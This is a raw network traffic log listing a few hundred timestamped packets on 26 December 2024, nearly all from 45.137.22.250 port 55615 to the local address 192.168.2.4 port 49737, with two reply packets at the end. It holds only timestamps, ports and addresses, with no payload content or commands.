Dec 26, 2024 17:42:19.786168098 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.786190033 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.786222935 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.786319017 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.786330938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.787856102 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.787868977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.787935019 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.787946939 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.789020061 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.789074898 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.789155960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.789177895 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.790121078 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.790132999 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.790146112 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.790199041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.790213108 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.791800022 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.791815042 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.791862011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.791891098 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.793586969 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.793600082 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.793685913 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.793699026 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.793713093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.795825005 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.795838118 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.795921087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.795933008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.797234058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.797246933 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.797261000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.797274113 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.797368050 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798053026 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798065901 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798089027 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798156023 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798218012 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798229933 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798311949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798367977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798381090 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798392057 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798407078 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798460007 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798506975 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798551083 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798563004 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798604965 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798666954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798680067 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798723936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798737049 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798764944 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798804998 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798877954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798917055 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.798989058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799001932 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799036980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799057961 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799119949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799187899 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799201012 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799302101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799321890 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799334049 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799388885 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799401999 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799412966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799426079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799441099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799453974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799465895 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799627066 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799638987 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799650908 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799664021 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799761057 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799772978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799829006 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799843073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799877882 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.799890041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800000906 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800014019 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800060987 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800072908 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800204992 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800218105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800285101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800371885 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800384998 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800395966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800429106 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800441027 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800518990 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800530910 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800549984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800649881 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800662994 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800703049 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800795078 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800807953 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800821066 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800928116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800940990 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.800952911 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801034927 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801047087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801060915 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801104069 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801141977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801176071 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801228046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801239967 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801312923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801326036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801377058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801389933 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801487923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.801501036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881550074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881592035 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881649017 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881694078 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881721973 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881753922 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881795883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881841898 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881870031 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881941080 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.881968975 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882061958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882090092 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882138014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882164001 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882211924 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882239103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882265091 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882292032 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882339954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882365942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882395983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882422924 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882493973 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882520914 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882546902 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882574081 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882622004 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882651091 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882698059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882725000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882791042 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882817984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882862091 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882888079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882941008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882967949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.882997990 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883025885 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883088112 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883115053 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883141041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883167982 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883198977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883224964 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883251905 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883279085 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883348942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883378029 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883404016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883435011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.883461952 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884022951 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884049892 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884098053 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884125948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884176970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884188890 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884211063 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884222984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884233952 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884248018 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884330988 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884344101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884382963 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884445906 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884454966 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884485960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884495974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884581089 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884589911 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.884597063 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885025978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885035992 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885103941 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885263920 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885272980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885283947 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885354042 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885369062 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885516882 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885560989 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885612011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885782003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885791063 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885802031 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885864019 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885873079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885955095 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.885963917 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886081934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886094093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886471987 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886558056 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886598110 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886688948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886715889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886809111 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886853933 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.886965036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887049913 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887100935 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887109995 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887155056 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887164116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887269020 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887278080 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.887285948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.890979052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891009092 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891083002 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891100883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891227961 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891285896 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891352892 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891361952 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891386986 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891402960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891866922 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891876936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.891916037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.892004013 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.892997980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893038988 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893054962 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893168926 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893352985 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893369913 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893433094 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893441916 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893682957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893724918 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893734932 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893913984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893923044 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.893966913 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894340992 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894387007 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894440889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894450903 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894498110 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894509077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894624949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894675016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.894932032 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895030975 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895072937 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895107985 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895123959 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895157099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895167112 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895220041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895229101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895242929 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895524025 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895533085 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895592928 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895659924 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895705938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895770073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895826101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895834923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.895965099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896070957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896080017 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896192074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896225929 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896300077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896315098 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896384954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896527052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896543026 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896569014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896629095 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896639109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896676064 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896743059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896752119 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896785021 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.896850109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897073984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897135973 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897232056 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897289991 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897384882 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897408009 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897543907 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897552967 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897641897 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897650957 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897685051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897694111 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897721052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897749901 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897841930 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897851944 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897942066 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.897978067 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898060083 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898067951 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898102045 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898111105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898145914 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.898154974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.938684940 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.110738039 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:21.113604069 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:21.114028931 CET	49737	55615	192.168.2.4	45.137.22.250
